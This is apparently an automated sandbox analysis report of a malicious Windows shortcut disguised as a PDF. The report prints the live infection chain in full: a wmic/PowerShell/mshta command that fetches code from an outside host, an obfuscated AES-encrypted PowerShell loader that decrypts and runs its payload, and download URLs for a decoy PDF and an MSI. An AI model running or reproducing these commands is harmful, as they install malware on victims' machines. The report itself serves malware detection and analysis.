Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Company Information.pdf.lnk

Overview

General Information

Sample name:Company Information.pdf.lnk
Analysis ID:1579316
MD5:945f4a91e15e064475037923ecc3488f
SHA1:9ef39e345e6ab06dbea4825c1853baad6d678e76
SHA256:470da05f44f016077661e2335c52801b0ef73e5b37b09adf74a021c292f0d1ca
Tags:evanbconsultancy-comlnkuser-smica83
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 6640 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6376 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1240 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 6912 cmdline: "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 7496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 7716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Company%20Information.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 8044 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 5732 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1632,i,8924348424998603111,1472651231245684160,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 7396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy, CommandLine: "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://evanbconsultancy.com/Sand/Buddy", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1240, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://evanbconsultancy.com/Sand/Buddy, ProcessId: 6912, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC71
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')", ProcessId: 6640, ProcessName: WMIC.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC712DC4913AC95B231C44FD0E7658E3CB70005CF09FB0595EA559B76132DAEB0D282BEEA68B55E7A9BA44EF8B45601264C8696BD55528EF1B9DD98948B27EC7AB79A994DCE5DC246101471E8511E44683A6A4FE675F17184B0F45DD710B0F3E934D3E87202452FBA857892530000F7A72AA942B3A7D215E363C31E439657BB692997478E7649840E3437D9791C71EE2B525FFBC5C786EA290EE8548D38794A4901D3E34E39A178B30A8BCB2E9F77F8824F798590E894BAA701C583A6EE6499D5DF0288032084FF43FA83E2C5C6512028F2396510D21950EF4F2FB6318F3A83552C75935D4092DEB0C6B32CB3A99F0963415214D188C9BA0BF5D41A7805B5D549104E9B78022BF15FA2D7048395767284235F5312081A7124F018F4E91EACDBCCF751A9F28FF37CAF076B6690F025C400C18E2BD9E1A7BD3ED7F7A96C28C15F00B93909DF3C243E431A52E02F105C946283D2D013B71935B51194D17B7BA6983861748E298038CEAD85ED1B369523E084E49C8D30900FE651D1CA9CE4AEBC5CA07121E32BED105B864D5F70953DD58446FBAF635CA7BFB75757279A3990FB975F4A6CA8319BCBB285862375238FD471009713449C2B5759EB614AB609037130BDD0DF5A80E11753BF15D370D14D9457E1A29A143C2993ABCEFC9EBB18A41FD7F01477B69689096D79B0C830798EE3FDD6CCAA115FED76DA4C183FA9145AE9365194967DBD487693C4F977EE4623572CD65340F824D903A9BEE74E567BA2A59D6049158CA16BAF1E740DCFF074D5B76ACD69BD6E62C8FFE8ACB399E025061A2791DCAC39AD53DA9B95EBE3B0E8F162CEDA33CA00F31C9EE377C87715D2EB5D1329BBA8D59E15DE0E867D91D45FCE6A1C1E307F17C1C44415AC23730598729B5AF81791F4BD7DD68D59E5463C9A238BF8BA3D80F58D15CBCBD76A2244C6935E83F51AEB529749508568CDB60F284E5D4320EF0CF1DB2FBEC894A24FF83258219EC3A042E9EA4B7B09A2D6BBF3BA837EF69734C94330CC4312719B08A8D97BED4CA520D35A041F982D71D75204AAE0EA20B8D73572E4BFF0EB5AC4F25EA4DB8C036BC8EABC00D579CC10384D09ABD62B02E86C3A1C7F8C862DE3364811CAB68EB1786B7786BC5725D3493F05A15EAEEE2EE6686D91A9B01CBD4C7885E2B196DAB3663650F11D71EEEDB96A2AAF3442EF119D05205B47F44D7200C81C465F54C21EBC99FF2B96579620097C613B589DD515E8CB8F3230A889E2C6385042EE85D8032B14D1F7031C085BA84F4AF0C953A0070931BB3147C2D40EA5E24309522AE090CC33FD5B9A998F2F88D262EBF6918701F47BB35F236B9AD77BEC3181393A4E03153A5F978106133C121B91E124075B26668FA32D6D38C829EF61BA386E20E210F9B2F8550F9D7F0472F77303A216FA96285E529D264EF798AC3EE226E25F6E9FD15A30A8B1993A229685BC002198BE999C694C7545467374416D7458766A525558';function slF ($bNBDb){return -split ($bNBDb -replace '..', '0x$& ')};$rzZJRI = slF($ddg.SubString(0, 2208));$qvt = [System.Security.Cryptography.Aes]::Create();$qvt.Key = slF($ddg.SubString(2208));$qvt.IV = New-Object byte[] 16;$yPsRN = $qvt.CreateDecryptor();$qVJApxuJ = [System.String]::new($yPsRN.TransformFinalBlock($rzZJRI, 0,$rzZJRI.Length)); sal fd $qVJApxuJ.Substring(3,3); fd $qVJApxuJ.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '3A0550E6F02FF19F0D7D65ABA4322B948E6128C005B35A41C185638A3B71C4B033F6793763A141FC2DF5F78A32CFE93FB3F106BBC73BC0347EB5117739EA6BCDC71
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 6640, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://evanbconsultancy.com/Sand/Buddy'), ProcessId: 6376, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7396, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-21T15:02:25.556249+010028033053Unknown Traffic192.168.2.74972384.32.84.121443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Buddy[1]ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: Company Information.pdf.lnkReversingLabs: Detection: 28%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: unknownHTTPS traffic detected: 84.32.84.121:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 84.32.84.121:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 84.32.84.121:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.1514828512.000001BBD299D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c.pdb source: mshta.exe, 0000000B.00000003.1522396244.00000202BA3EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1542653933.00000202BA3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523866483.00000202BA3F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547057338.00000202BA3F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 0000000B.00000003.1521959961.00000202BE3EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522396244.00000202BA3EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523025408.00000202BA3FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523488640.00000202BA3FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522939946.00000202BE3AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522990692.00000202BE391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1522854586.00000202BE390000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547408021.00000202BE2D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE2F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523955963.00000202BE341000.00000004.00000020.00020000.00000000.sdmp, Buddy[1].11.dr
Source: Binary string: ows\dll\System.pdb source: powershell.exe, 0000000F.00000002.1514316227.000001BBD296E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hpdbtem.pdb source: powershell.exe, 0000000F.00000002.1514316227.000001BBD296E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb source: mshta.exe, 0000000B.00000003.1522396244.00000202BA3EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523488640.00000202BA3FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000002.1547408021.00000202BE2D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523402554.00000202BE2F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1523955963.00000202BE341000.00000004.00000020.00020000.00000000.sdmp, Buddy[1].11.dr
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000F.00000002.1515804009.000001BBD2C07000.00000004.00000020.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /Fuel/Company%20Information.pdf HTTP/1.1Host: evanbconsultancy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Light/OGCMTYTR.msi HTTP/1.1Host: evanbconsultancy.com
Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49723 -> 84.32.84.121:443
Source: global trafficHTTP traffic detected: GET /Sand/Buddy HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: evanbconsultancy.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /Sand/Buddy HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: evanbconsultancy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Fuel/Company%20Information.pdf HTTP/1.1Host: evanbconsultancy.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Light/OGCMTYTR.msi HTTP/1.1Host: evanbconsultancy.com
Source: global trafficDNS traffic detected: DNS query: evanbconsultancy.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Dec 2024 14:02:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingx-powered-by: PHP/8.2.20expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://evanbconsultancy.com/wp-json/>; rel="https://api.w.org/"platform: hostingerpanel: hpanelcontent-security-policy: upgrade-insecure-requestsx-turbo-charged-by: LiteSpeedServer: hcdnalt-svc: h3=":443"; ma=86400x-hcdn-request-id: feab88e6b2425167f719ed53fc5720d6-bos-edge1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Dec 2024 14:02:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingx-powered-by: PHP/8.2.20expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://evanbconsultancy.com/wp-json/>; rel="https://api.w.org/"platform: hostingerpanel: hpanelcontent-security-policy: upgrade-insecure-requestsServer: hcdnalt-svc: h3=":443"; ma=86400x-hcdn-request-id: 6c200b0b40ccb4c75f5dab7828e9bb32-bos-edge2
Source: powershell.exe, 0000000F.00000002.1515747127.000001BBD2A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftb
Source: svchost.exe, 0000000E.00000002.2526074517.000001F6FDA84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.21.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBAF7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBB062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://evanbconsultancy.com
Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000000F.00000002.1510173870.000001BBCA9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1510173870.000001BBCA8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.1429491981.000001BBBAA59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.1305508383.0000025E5859C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1429491981.000001BBBA831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
